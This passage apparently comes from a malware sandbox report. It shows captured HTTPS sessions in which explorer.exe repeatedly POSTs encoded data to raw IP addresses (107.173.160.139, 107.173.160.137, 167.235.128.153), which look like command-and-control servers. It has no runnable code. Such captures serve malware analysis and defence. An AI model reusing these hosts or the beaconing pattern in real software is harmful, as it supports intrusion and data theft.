                                                          2024-07-19 11:44:21 UTC16384OUTData Raw: 75 63 51 57 7a 50 57 73 61 45 4f 47 34 33 62 50 4d 77 53 51 36 71 54 64 66 64 71 45 32 6a 48 4e 77 36 45 34 50 41 7a 4e 51 4a 42 73 64 34 66 75 56 65 4c 50 72 58 76 55 49 50 75 41 6b 61 53 39 6c 4f 53 6f 79 56 61 69 62 56 55 32 52 4d 6b 2f 4a 54 35 6d 4a 68 38 4b 55 78 48 31 33 7a 47 64 37 41 79 57 4c 41 45 52 56 64 6e 4a 70 72 4a 64 61 62 7a 4b 35 6d 4b 37 74 52 68 56 6a 38 71 72 39 66 42 4e 4b 72 51 4d 74 6e 4c 65 6f 39 33 55 75 62 4e 6b 48 4f 42 50 53 6b 45 6f 37 4c 57 76 2b 5a 45 67 2b 6c 55 6b 6f 49 51 4c 2f 50 37 55 6c 58 4a 76 52 48 38 2b 2f 34 63 76 4e 4a 4c 68 41 46 48 6d 49 55 59 31 68 39 2f 4a 45 6c 59 4f 69 57 6a 6c 4f 4b 39 56 36 71 30 76 49 45 59 46 52 55 32 32 39 6c 6d 44 45 44 75 53 6c 38 77 42 39 30 6f 78 64 6f 6e 75 36 57 2b 4b 44 30 73
                                                          Data Ascii: ucQWzPWsaEOG43bPMwSQ6qTdfdqE2jHNw6E4PAzNQJBsd4fuVeLPrXvUIPuAkaS9lOSoyVaibVU2RMk/JT5mJh8KUxH13zGd7AyWLAERVdnJprJdabzK5mK7tRhVj8qr9fBNKrQMtnLeo93UubNkHOBPSkEo7LWv+ZEg+lUkoIQL/P7UlXJvRH8+/4cvNJLhAFHmIUY1h9/JElYOiWjlOK9V6q0vIEYFRU229lmDEDuSl8wB90oxdonu6W+KD0s
                                                          2024-07-19 11:44:21 UTC16384OUTData Raw: 2f 43 71 76 65 4c 76 67 71 43 70 72 53 77 5a 6d 66 46 7a 74 4e 76 72 69 39 4c 54 48 4b 77 70 75 32 71 41 52 2f 33 6a 4d 6c 79 36 75 62 35 38 45 58 61 69 2b 4e 38 34 51 6a 53 5a 39 6a 68 69 38 39 59 54 54 66 36 6a 74 4a 2b 48 46 69 52 2f 57 70 54 48 71 44 6e 47 35 4a 64 62 79 77 6e 66 4e 62 44 53 4d 6a 45 31 2b 6c 37 6a 4f 6d 45 41 31 31 53 6c 46 68 75 6d 54 74 75 71 48 49 64 34 61 65 61 72 75 30 52 59 37 6c 71 65 31 4c 39 2f 62 2b 56 75 51 51 43 6d 78 65 6a 4f 37 66 39 68 4d 44 45 6d 42 77 61 73 4a 67 4f 36 32 4a 4d 2f 66 53 4d 75 77 67 32 66 68 49 54 30 58 6c 4f 75 54 2f 32 46 41 79 76 51 67 31 51 53 44 4f 64 64 6c 64 6a 62 37 32 6b 57 4d 72 78 4f 70 70 4b 74 41 33 32 31 56 6a 50 46 76 72 73 38 4d 48 42 33 4d 33 63 4a 34 66 4c 73 48 64 6c 4a 72 2b 71 6a
                                                          Data Ascii: /CqveLvgqCprSwZmfFztNvri9LTHKwpu2qAR/3jMly6ub58EXai+N84QjSZ9jhi89YTTf6jtJ+HFiR/WpTHqDnG5JdbywnfNbDSMjE1+l7jOmEA11SlFhumTtuqHId4aearu0RY7lqe1L9/b+VuQQCmxejO7f9hMDEmBwasJgO62JM/fSMuwg2fhIT0XlOuT/2FAyvQg1QSDOddldjb72kWMrxOppKtA321VjPFvrs8MHB3M3cJ4fLsHdlJr+qj
                                                          2024-07-19 11:44:21 UTC16384OUTData Raw: 54 79 69 6a 32 44 4e 53 32 49 4b 47 42 2b 59 63 56 6c 2f 61 56 4a 64 36 53 5a 44 52 4a 46 6d 65 6e 56 39 55 41 4d 6b 4a 70 4e 31 33 48 71 5a 7a 35 72 32 2f 32 74 65 4c 54 45 75 46 7a 64 34 57 68 68 30 2b 66 44 36 78 47 55 6a 37 68 5a 32 4d 37 76 6d 39 4e 41 30 51 61 4a 4d 6e 6c 42 79 6f 73 4b 5a 72 5a 52 48 70 39 58 76 4b 6d 63 69 2f 53 4d 6b 39 4e 58 68 36 51 30 64 4c 65 67 31 6c 44 6f 32 72 6f 52 73 31 55 58 32 38 50 68 32 70 6b 61 59 6e 53 6e 6f 35 67 4b 61 78 49 70 48 46 36 51 2b 61 51 77 46 34 77 77 65 4b 2b 2b 38 57 56 46 71 67 54 56 5a 74 6f 67 39 34 74 69 6f 4c 64 77 78 47 32 4d 33 51 51 70 4d 4c 6e 64 42 6b 2f 49 43 42 41 43 72 78 45 42 33 45 49 48 5a 2f 54 45 46 39 4f 48 73 34 75 68 72 65 31 4d 4a 75 4f 50 44 75 2f 74 37 7a 52 73 44 6b 68 69 61
                                                          Data Ascii: Tyij2DNS2IKGB+YcVl/aVJd6SZDRJFmenV9UAMkJpN13HqZz5r2/2teLTEuFzd4Whh0+fD6xGUj7hZ2M7vm9NA0QaJMnlByosKZrZRHp9XvKmci/SMk9NXh6Q0dLeg1lDo2roRs1UX28Ph2pkaYnSno5gKaxIpHF6Q+aQwF4wweK++8WVFqgTVZtog94tioLdwxG2M3QQpMLndBk/ICBACrxEB3EIHZ/TEF9OHs4uhre1MJuOPDu/t7zRsDkhia
                                                          2024-07-19 11:44:21 UTC16384OUTData Raw: 67 51 59 2f 31 37 48 76 41 69 73 76 35 47 51 6f 78 77 31 6c 65 36 45 64 32 50 54 70 53 4f 4c 4a 62 75 37 32 4c 4f 5a 72 61 41 61 73 61 55 51 64 78 6f 38 70 45 62 41 30 74 61 33 74 55 50 34 32 61 4d 58 62 58 64 56 37 62 63 76 51 34 72 6f 35 6d 69 2b 51 7a 78 37 4b 2b 78 53 2b 79 47 36 51 42 6f 71 75 75 6b 7a 5a 57 49 6b 32 4e 53 30 65 30 63 43 52 33 78 4d 66 78 65 63 41 69 55 4d 31 4d 63 70 33 61 63 39 59 55 6c 57 31 43 6a 30 44 4d 31 32 55 78 66 61 64 71 62 42 67 4e 53 6f 4c 52 75 50 68 72 69 52 48 5a 4b 75 74 72 6c 35 46 6e 63 4f 6a 77 59 78 57 4e 71 32 66 56 57 45 74 47 6b 56 6d 5a 6e 35 2f 35 50 50 36 6c 74 2f 51 37 43 4c 70 69 4d 48 41 52 68 54 32 6a 6d 7a 4c 34 2f 66 4e 6c 36 31 54 32 41 2f 79 48 57 74 50 43 54 5a 54 7a 50 56 77 36 37 48 59 4d 66 65
                                                          Data Ascii: gQY/17HvAisv5GQoxw1le6Ed2PTpSOLJbu72LOZraAasaUQdxo8pEbA0ta3tUP42aMXbXdV7bcvQ4ro5mi+Qzx7K+xS+yG6QBoquukzZWIk2NS0e0cCR3xMfxecAiUM1Mcp3ac9YUlW1Cj0DM12UxfadqbBgNSoLRuPhriRHZKutrl5FncOjwYxWNq2fVWEtGkVmZn5/5PP6lt/Q7CLpiMHARhT2jmzL4/fNl61T2A/yHWtPCTZTzPVw67HYMfe
                                                          2024-07-19 11:44:21 UTC16384OUTData Raw: 43 6e 67 54 6e 31 55 53 73 6e 31 2f 54 33 31 67 32 7a 6a 78 63 77 44 4d 50 55 54 45 50 73 46 54 37 4f 4e 34 6d 44 36 50 6a 4e 6f 2b 61 77 4c 30 58 31 2f 58 32 6b 35 76 38 75 47 7a 6f 69 7a 51 59 66 65 61 39 51 66 62 66 45 2f 4e 33 4a 51 47 35 38 59 71 78 35 41 61 69 2b 68 44 67 57 4e 2f 78 32 45 42 34 55 38 45 67 7a 56 34 4a 79 63 36 42 62 58 46 43 6f 51 53 71 6f 75 33 6c 6c 69 6a 6b 59 46 64 46 73 31 56 34 6c 59 58 55 33 7a 37 58 48 70 78 72 71 51 34 50 41 45 32 49 61 63 64 42 70 70 69 71 77 38 53 30 42 78 39 6f 51 51 70 7a 61 74 44 52 74 52 43 6c 48 70 37 2b 6c 54 4b 6f 34 48 72 6a 6c 59 69 65 4f 51 50 6b 72 63 6c 6d 73 49 52 6e 6b 57 49 31 62 62 53 6a 41 54 63 39 59 74 73 33 6f 4f 61 6f 2f 55 4c 39 65 35 35 64 4d 49 44 30 67 78 64 74 7a 71 52 6d 56 72
                                                          Data Ascii: CngTn1USsn1/T31g2zjxcwDMPUTEPsFT7ON4mD6PjNo+awL0X1/X2k5v8uGzoizQYfea9QfbfE/N3JQG58Yqx5Aai+hDgWN/x2EB4U8EgzV4Jyc6BbXFCoQSqou3llijkYFdFs1V4lYXU3z7XHpxrqQ4PAE2IacdBppiqw8S0Bx9oQQpzatDRtRClHp7+lTKo4HrjlYieOQPkrclmsIRnkWI1bbSjATc9Yts3oOao/UL9e55dMID0gxdtzqRmVr
                                                          2024-07-19 11:44:21 UTC16384OUTData Raw: 64 71 52 79 65 45 31 41 32 36 34 6c 49 4b 2f 4d 79 54 48 4a 56 75 6b 30 51 78 54 75 67 72 2b 68 59 75 68 31 41 74 49 71 5a 2b 75 66 61 4e 45 55 44 37 6a 6c 78 48 43 75 46 2f 42 41 73 6a 31 38 58 62 75 58 43 6b 4a 57 39 63 59 31 30 59 56 63 44 36 4d 74 61 58 6f 53 62 76 54 68 61 77 5a 77 34 42 32 74 32 64 49 44 64 55 32 49 6f 55 47 46 6c 53 76 49 75 64 4e 73 6c 2b 48 31 4c 53 78 2f 7a 69 6c 51 4b 39 6a 59 46 4f 73 75 7a 78 53 53 65 49 61 56 53 44 65 43 69 4c 36 33 54 4c 41 4d 42 63 2b 44 70 4f 35 61 69 4b 6e 61 6b 63 66 7a 66 51 6f 7a 51 43 56 72 52 7a 62 33 37 30 67 5a 70 49 35 44 46 5a 35 61 70 67 33 79 7a 67 39 7a 73 77 78 67 72 57 4f 73 44 48 68 6f 2f 39 35 58 30 30 50 69 63 31 4f 76 6e 74 37 34 7a 65 34 75 69 63 51 76 66 68 55 34 67 36 36 32 4d 7a 35
                                                          Data Ascii: dqRyeE1A264lIK/MyTHJVuk0QxTugr+hYuh1AtIqZ+ufaNEUD7jlxHCuF/BAsj18XbuXCkJW9cY10YVcD6MtaXoSbvThawZw4B2t2dIDdU2IoUGFlSvIudNsl+H1LSx/zilQK9jYFOsuzxSSeIaVSDeCiL63TLAMBc+DpO5aiKnakcfzfQozQCVrRzb370gZpI5DFZ5apg3yzg9zswxgrWOsDHho/95X00Pic1Ovnt74ze4uicQvfhU4g662Mz5
                                                          2024-07-19 11:44:21 UTC16384OUTData Raw: 46 41 71 66 32 4d 56 5a 70 4e 47 68 78 70 45 71 72 62 48 36 42 41 6f 70 2f 4f 51 58 69 44 58 37 65 48 67 58 59 33 48 75 48 54 66 4e 68 6d 41 56 69 30 77 70 7a 49 53 69 32 6e 65 65 44 4b 47 6d 68 37 54 50 73 6f 48 79 42 69 4b 41 45 31 75 63 76 4d 35 76 45 6d 2f 49 45 6a 7a 5a 58 56 4b 52 31 61 41 64 6c 53 38 73 69 58 43 46 46 59 75 5a 71 41 6a 6a 71 5a 6d 55 55 46 34 32 31 7a 35 38 76 50 2f 57 32 69 32 32 72 32 53 67 6d 43 30 62 46 53 38 6f 35 58 53 6f 62 35 72 69 4f 4d 4c 5a 37 50 56 67 57 75 57 6e 76 37 63 44 79 70 5a 32 57 36 47 43 37 2b 32 71 62 54 63 70 2b 34 2f 48 4f 6f 79 4b 6d 48 6d 50 52 6a 58 54 78 47 43 4e 6e 4b 31 6c 6f 7a 65 42 65 4a 42 62 48 73 2b 6b 69 51 30 74 46 77 61 48 65 32 54 48 45 74 33 32 67 4c 4f 47 73 4e 70 65 49 4a 49 78 79 77 4c
                                                          Data Ascii: FAqf2MVZpNGhxpEqrbH6BAop/OQXiDX7eHgXY3HuHTfNhmAVi0wpzISi2neeDKGmh7TPsoHyBiKAE1ucvM5vEm/IEjzZXVKR1aAdlS8siXCFFYuZqAjjqZmUUF421z58vP/W2i22r2SgmC0bFS8o5XSob5riOMLZ7PVgWuWnv7cDypZ2W6GC7+2qbTcp+4/HOoyKmHmPRjXTxGCNnK1lozeBeJBbHs+kiQ0tFwaHe2THEt32gLOGsNpeIJIxywL
                                                          2024-07-19 11:44:21 UTC16384OUTData Raw: 34 76 52 4d 30 48 43 78 57 55 45 7a 48 34 54 34 30 45 6f 2f 67 77 35 55 31 72 59 74 33 55 38 66 44 4b 6c 62 63 37 74 75 49 65 34 2f 30 6c 75 73 53 76 49 6a 79 62 43 36 68 37 41 48 55 7a 77 79 39 7a 4b 65 4d 38 67 57 75 73 59 6f 4b 33 51 76 70 4d 61 61 50 53 47 71 37 4c 71 62 57 75 33 4d 50 44 49 73 74 68 51 69 4d 62 36 64 58 55 77 69 44 55 48 4d 72 67 6d 44 67 39 41 69 49 69 6c 38 7a 70 64 4f 37 48 6b 6e 36 54 2f 56 49 6b 36 46 67 35 7a 69 55 64 70 7a 35 67 2f 45 44 47 69 31 63 6c 56 6f 79 57 64 6e 42 75 49 44 65 34 35 63 77 70 77 54 4d 6f 71 38 5a 65 78 34 47 31 56 7a 4b 41 43 62 51 30 42 4f 74 4f 48 4b 33 59 42 78 37 76 36 51 6e 4b 2b 6f 39 6c 48 79 2b 68 68 65 45 34 46 6e 33 37 62 4f 54 4f 52 4b 50 61 33 42 6f 53 75 4b 56 72 30 65 51 44 6a 61 56 37 4f
                                                          Data Ascii: 4vRM0HCxWUEzH4T40Eo/gw5U1rYt3U8fDKlbc7tuIe4/0lusSvIjybC6h7AHUzwy9zKeM8gWusYoK3QvpMaaPSGq7LqbWu3MPDIsthQiMb6dXUwiDUHMrgmDg9AiIil8zpdO7Hkn6T/VIk6Fg5ziUdpz5g/EDGi1clVoyWdnBuIDe45cwpwTMoq8Zex4G1VzKACbQ0BOtOHK3YBx7v6QnK+o9lHy+hheE4Fn37bOTORKPa3BoSuKVr0eQDjaV7O
                                                          2024-07-19 11:44:21 UTC9083OUTData Raw: 68 7a 57 75 78 57 58 44 62 4e 70 7a 73 77 75 32 7a 56 4d 2b 75 53 71 5a 6c 78 33 6b 6a 32 42 6e 73 79 58 76 48 34 49 73 46 74 51 4c 53 79 76 68 6f 43 62 44 32 70 4f 72 73 54 45 69 43 42 66 42 39 73 43 38 74 59 63 41 39 6d 46 56 47 30 78 44 39 33 61 4d 61 70 6e 4e 52 75 69 76 63 4b 77 39 57 78 35 48 31 39 35 53 2b 4f 39 30 50 6e 35 6f 4f 5a 4e 35 5a 68 38 4c 4c 30 35 6f 57 53 58 59 72 68 59 43 33 71 57 4e 61 6c 56 61 7a 59 50 54 4f 68 50 2f 4e 47 46 47 56 2b 5a 4a 61 6a 30 43 53 78 32 4e 46 54 58 65 6e 73 75 66 39 69 52 6c 62 77 54 34 59 31 62 6f 66 53 68 34 73 44 49 69 44 77 34 4e 55 2f 57 73 55 48 53 73 57 54 54 51 6a 6e 73 49 51 37 72 73 53 33 48 57 7a 31 6d 51 62 55 51 37 38 55 69 4a 37 36 4e 62 45 4b 6a 71 61 59 68 43 51 78 72 62 78 69 43 76 57 44 4a
                                                          Data Ascii: hzWuxWXDbNpzswu2zVM+uSqZlx3kj2BnsyXvH4IsFtQLSyvhoCbD2pOrsTEiCBfB9sC8tYcA9mFVG0xD93aMapnNRuivcKw9Wx5H195S+O90Pn5oOZN5Zh8LL05oWSXYrhYC3qWNalVazYPTOhP/NGFGV+ZJaj0CSx2NFTXensuf9iRlbwT4Y1bofSh4sDIiDw4NU/WsUHSsWTTQjnsIQ7rsS3HWz1mQbUQ78UiJ76NbEKjqaYhCQxrbxiCvWDJ
                                                          2024-07-19 11:44:23 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:23 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.557795107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:23 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1143
                                                          2024-07-19 11:44:23 UTC1143OUTData Raw: 41 4f 34 52 6e 73 46 38 53 2f 63 4a 66 43 79 65 54 6e 6b 31 4a 36 73 79 71 39 50 7a 6b 4e 33 4a 41 51 68 75 6b 52 33 71 39 47 4e 72 67 5a 71 56 38 61 69 61 32 45 48 2b 49 6b 49 4e 66 50 45 30 6a 4d 45 2b 52 61 63 31 4a 2b 32 39 52 6a 31 6c 61 6d 47 6c 54 58 6b 6a 69 62 52 68 2b 43 4b 2b 71 71 6b 56 58 2b 6d 75 75 53 44 34 73 6d 7a 61 6e 30 6f 62 59 34 62 71 31 30 33 72 4c 6e 51 63 6f 4b 31 56 37 6e 36 6c 58 62 73 50 37 47 2f 37 74 59 50 70 67 6c 4e 6d 33 79 57 72 6a 72 7a 56 57 4b 75 6f 2f 61 77 45 58 64 68 6c 78 4d 35 53 47 55 70 75 30 72 56 35 72 66 58 2f 4d 64 4c 55 4d 7a 43 50 50 47 52 57 63 6e 44 68 79 46 6b 7a 70 5a 32 72 68 39 4f 63 59 42 79 74 51 39 58 34 6f 35 74 43 2f 38 53 36 34 75 67 4c 48 62 42 74 51 75 53 68 31 62 70 68 55 2f 51 52 69 67 46
                                                          Data Ascii: AO4RnsF8S/cJfCyeTnk1J6syq9PzkN3JAQhukR3q9GNrgZqV8aia2EH+IkINfPE0jME+Rac1J+29Rj1lamGlTXkjibRh+CK+qqkVX+muuSD4smzan0obY4bq103rLnQcoK1V7n6lXbsP7G/7tYPpglNm3yWrjrzVWKuo/awEXdhlxM5SGUpu0rV5rfX/MdLUMzCPPGRWcnDhyFkzpZ2rh9OcYBytQ9X4o5tC/8S64ugLHbBtQuSh1bphU/QRigF
                                                          2024-07-19 11:44:25 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:25 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:25 UTC685INData Raw: 56 53 54 52 44 52 57 30 4e 55 49 49 4a 6c 72 6e 30 71 38 59 30 74 30 58 32 6e 35 42 2f 73 6d 6f 4d 45 39 6b 43 37 35 62 6c 6a 43 51 4b 68 36 37 51 30 4b 76 67 4d 73 52 57 62 34 33 42 74 64 75 4d 65 39 69 57 79 4e 46 4f 6c 33 66 37 77 44 35 38 74 45 63 45 7a 49 4c 75 53 39 47 46 47 2f 73 77 4a 2f 65 4d 62 68 57 73 4e 49 4a 62 6c 42 67 4b 5a 48 77 74 39 36 73 2b 32 41 73 7a 78 69 63 50 6a 54 56 48 77 70 57 58 4b 6f 53 4d 63 79 5a 39 50 63 32 42 44 7a 41 68 74 73 5a 6a 71 32 47 46 56 6b 4d 52 65 48 75 58 73 5a 70 5a 76 53 6b 77 43 34 37 6d 6e 51 38 6e 69 33 35 7a 70 69 4e 41 4c 2b 62 6f 5a 44 33 65 2b 49 5a 45 73 4a 7a 74 2b 45 32 44 32 50 79 68 61 33 6b 6d 5a 65 64 38 38 62 5a 58 39 53 75 72 31 59 59 2f 61 59 45 50 42 47 33 53 58 4b 58 4e 49 6a 47 67 53 50
                                                          Data Ascii: VSTRDRW0NUIIJlrn0q8Y0t0X2n5B/smoME9kC75bljCQKh67Q0KvgMsRWb43BtduMe9iWyNFOl3f7wD58tEcEzILuS9GFG/swJ/eMbhWsNIJblBgKZHwt96s+2AszxicPjTVHwpWXKoSMcyZ9Pc2BDzAhtsZjq2GFVkMReHuXsZpZvSkwC47mnQ8ni35zpiNAL+boZD3e+IZEsJzt+E2D2Pyha3kmZed88bZX9Sur1YY/aYEPBG3SXKXNIjGgSP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.557796167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:26 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:26 UTC1267OUTData Raw: 72 46 51 4a 4f 37 70 4c 65 38 4a 72 63 41 4e 61 4a 73 52 74 59 37 66 46 64 7a 38 74 59 38 36 6c 64 53 31 67 67 4d 52 32 57 71 30 4c 33 52 4f 4c 63 49 47 6e 42 34 71 30 70 58 43 4c 48 6a 6e 6a 72 5a 67 6e 43 6a 42 4c 78 47 6c 33 6c 6e 38 4a 6c 6c 7a 56 5a 6d 36 52 6c 6e 47 49 75 66 6b 73 6a 4c 71 6e 41 54 68 64 4e 35 56 4e 32 69 52 30 2f 69 32 47 53 42 38 69 76 6a 71 49 41 63 61 43 6e 44 56 6c 65 41 51 7a 6b 55 63 55 48 56 39 78 4d 6e 39 66 77 66 51 76 5a 42 41 39 51 4b 42 4a 75 43 76 38 34 37 54 55 71 5a 62 7a 4f 39 2b 53 72 4b 51 69 61 48 6f 74 4e 5a 72 4f 6a 71 6c 5a 46 43 52 6b 71 34 6f 44 67 63 6e 33 51 6b 78 2b 44 6b 46 36 49 55 57 6f 77 76 48 2b 6a 7a 57 4e 36 78 47 57 47 4b 55 64 31 59 55 5a 52 62 69 53 73 51 69 56 63 66 7a 7a 53 65 4e 57 6c 2f 56
                                                          Data Ascii: rFQJO7pLe8JrcANaJsRtY7fFdz8tY86ldS1ggMR2Wq0L3ROLcIGnB4q0pXCLHjnjrZgnCjBLxGl3ln8JllzVZm6RlnGIufksjLqnAThdN5VN2iR0/i2GSB8ivjqIAcaCnDVleAQzkUcUHV9xMn9fwfQvZBA9QKBJuCv847TUqZbzO9+SrKQiaHotNZrOjqlZFCRkq4oDgcn3Qkx+DkF6IUWowvH+jzWN6xGWGKUd1YUZRbiSsQiVcfzzSeNWl/V
                                                          2024-07-19 11:44:26 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:26 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:26 UTC685INData Raw: 59 67 57 50 53 74 75 63 57 68 74 4d 64 30 76 4d 2b 71 31 70 68 6d 4d 4c 75 45 39 76 54 49 41 6e 6d 2f 7a 77 48 75 33 30 4c 37 67 74 44 59 75 57 36 46 47 7a 59 72 34 47 52 66 4f 45 63 51 2b 72 51 36 33 59 5a 63 5a 55 66 4a 47 37 6f 51 6c 59 5a 46 49 4c 59 59 38 4d 64 33 54 58 6b 51 72 72 53 47 71 32 51 59 32 69 79 31 2f 73 67 45 4e 30 62 43 52 36 6a 74 72 4a 79 69 44 6a 64 6d 44 45 38 73 2f 50 55 68 62 5a 30 52 73 47 6c 6a 30 7a 50 38 68 57 4c 6e 35 36 69 47 48 44 50 35 79 33 64 69 56 76 2f 57 4e 71 77 6a 6f 49 74 50 6e 30 31 53 4d 6c 41 49 70 2b 44 75 47 44 78 48 4c 72 50 48 73 51 44 32 39 30 77 2f 75 4b 53 38 49 45 52 79 32 53 6e 79 57 4c 30 57 77 58 31 70 55 47 4d 35 45 56 44 2b 75 4e 41 2b 38 77 56 68 42 75 64 4e 7a 6a 79 31 4b 71 51 55 4c 49 76 59 52
                                                          Data Ascii: YgWPStucWhtMd0vM+q1phmMLuE9vTIAnm/zwHu30L7gtDYuW6FGzYr4GRfOEcQ+rQ63YZcZUfJG7oQlYZFILYY8Md3TXkQrrSGq2QY2iy1/sgEN0bCR6jtrJyiDjdmDE8s/PUhbZ0RsGlj0zP8hWLn56iGHDP5y3diVv/WNqwjoItPn01SMlAIp+DuGDxHLrPHsQD290w/uKS8IERy2SnyWL0WwX1pUGM5EVD+uNA+8wVhBudNzjy1KqQULIvYR


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.557797107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:27 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:44:27 UTC1122OUTData Raw: 48 56 6e 70 63 79 79 5a 61 75 41 48 37 49 70 4b 55 46 45 72 66 45 62 31 4b 73 73 74 44 46 38 4e 68 5a 53 62 47 65 71 55 50 52 73 54 79 6f 7a 68 46 30 70 6d 67 4e 56 48 63 55 37 36 44 76 44 57 59 31 50 64 6c 4c 30 33 59 4a 75 30 66 34 51 68 75 30 30 62 46 4b 32 41 49 43 6c 75 34 35 2b 6c 4f 71 6a 79 6d 68 76 74 45 69 50 72 6d 67 63 71 66 42 4d 2b 66 35 48 37 5a 4a 4b 67 76 4b 7a 74 4c 58 32 46 61 32 31 32 38 32 68 4d 54 5a 53 4c 50 39 61 32 76 67 54 79 6d 30 43 75 52 50 41 55 5a 2b 36 34 77 7a 61 64 31 47 6b 41 72 66 61 42 47 59 36 61 42 77 53 39 6a 43 35 7a 70 38 36 57 4e 67 4c 4c 72 49 70 66 61 79 2f 36 6f 2f 38 2b 30 76 4d 63 6d 6d 72 78 54 57 42 61 52 39 78 6c 69 55 50 36 44 7a 44 4b 63 44 4d 7a 64 63 31 72 69 75 43 54 45 42 7a 48 2f 72 79 75 4f 47 79
                                                          Data Ascii: HVnpcyyZauAH7IpKUFErfEb1KsstDF8NhZSbGeqUPRsTyozhF0pmgNVHcU76DvDWY1PdlL03YJu0f4Qhu00bFK2AIClu45+lOqjymhvtEiPrmgcqfBM+f5H7ZJKgvKztLX2Fa21282hMTZSLP9a2vgTym0CuRPAUZ+64wzad1GkArfaBGY6aBwS9jC5zp86WNgLLrIpfay/6o/8+0vMcmmrxTWBaR9xliUP6DzDKcDMzdc1riuCTEBzH/ryuOGy
                                                          2024-07-19 11:44:28 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:28 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:28 UTC685INData Raw: 35 49 6c 42 61 53 56 6e 4c 61 6f 54 42 55 38 41 33 78 79 39 74 6f 46 44 45 43 38 47 64 45 6b 74 61 55 70 43 65 61 30 71 66 77 72 6e 41 69 6d 6a 33 50 5a 75 6d 2f 6e 47 39 59 55 2f 4a 71 33 59 69 78 47 4e 6c 53 50 48 65 76 65 48 37 56 39 42 52 66 6c 37 61 49 44 31 56 6c 4a 55 73 63 71 70 75 64 4a 4b 5a 64 45 50 53 71 6e 61 4c 7a 49 39 64 6f 31 69 54 70 39 6a 67 45 79 45 69 65 61 6c 57 62 33 61 56 72 6f 47 51 6b 78 32 5a 59 39 4c 7a 38 4e 7a 4c 68 7a 34 68 2b 4a 48 58 72 71 55 70 4b 61 47 50 48 73 34 6a 77 4e 4d 74 63 67 78 53 69 52 6d 5a 49 4b 6f 72 42 2f 78 4a 48 43 46 78 33 35 4a 50 78 45 34 44 53 4f 63 71 67 37 78 79 50 47 50 64 48 52 49 45 71 55 74 77 4e 4c 78 76 32 63 43 63 59 59 7a 6c 71 53 43 44 45 50 64 69 4c 65 75 55 70 6b 59 74 33 55 64 49 6a 32
                                                          Data Ascii: 5IlBaSVnLaoTBU8A3xy9toFDEC8GdEktaUpCea0qfwrnAimj3PZum/nG9YU/Jq3YixGNlSPHeveH7V9BRfl7aID1VlJUscqpudJKZdEPSqnaLzI9do1iTp9jgEyEiealWb3aVroGQkx2ZY9Lz8NzLhz4h+JHXrqUpKaGPHs4jwNMtcgxSiRmZIKorB/xJHCFx35JPxE4DSOcqg7xyPGPdHRIEqUtwNLxv2cCcYYzlqSCDEPdiLeuUpkYt3UdIj2


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.557798107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:29 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:44:29 UTC1122OUTData Raw: 53 71 39 6a 33 4c 2b 36 44 4d 67 61 2b 68 79 50 45 67 78 70 4f 54 6c 4a 62 54 47 4a 32 6b 2f 51 31 66 71 41 39 5a 74 54 75 4c 78 35 77 37 6f 67 39 71 79 6f 4d 46 41 49 6e 75 70 36 4a 6d 58 6c 48 36 36 4a 7a 48 74 43 59 52 4e 5a 39 2b 49 62 74 52 68 33 45 45 4a 6d 4f 5a 36 48 32 67 4b 7a 44 52 39 57 4b 44 69 6a 6b 6c 41 37 69 58 39 36 70 42 6c 4f 48 4a 63 54 32 4b 59 4c 66 4a 57 6d 64 2b 78 4f 34 71 49 72 6e 41 4c 33 65 6e 54 47 31 32 46 66 49 4b 4b 69 30 44 72 71 34 62 44 37 30 67 49 49 64 74 68 48 30 36 51 37 39 36 70 61 67 69 38 75 52 48 36 72 42 35 6b 67 75 54 6c 32 79 50 70 2f 73 76 5a 4c 32 35 38 4c 48 45 31 33 6f 45 78 54 54 55 38 72 61 41 53 43 59 63 77 30 38 73 4b 76 72 39 43 49 6e 73 73 62 66 37 62 32 2b 4b 36 38 64 47 45 4e 68 39 5a 32 54 37 31
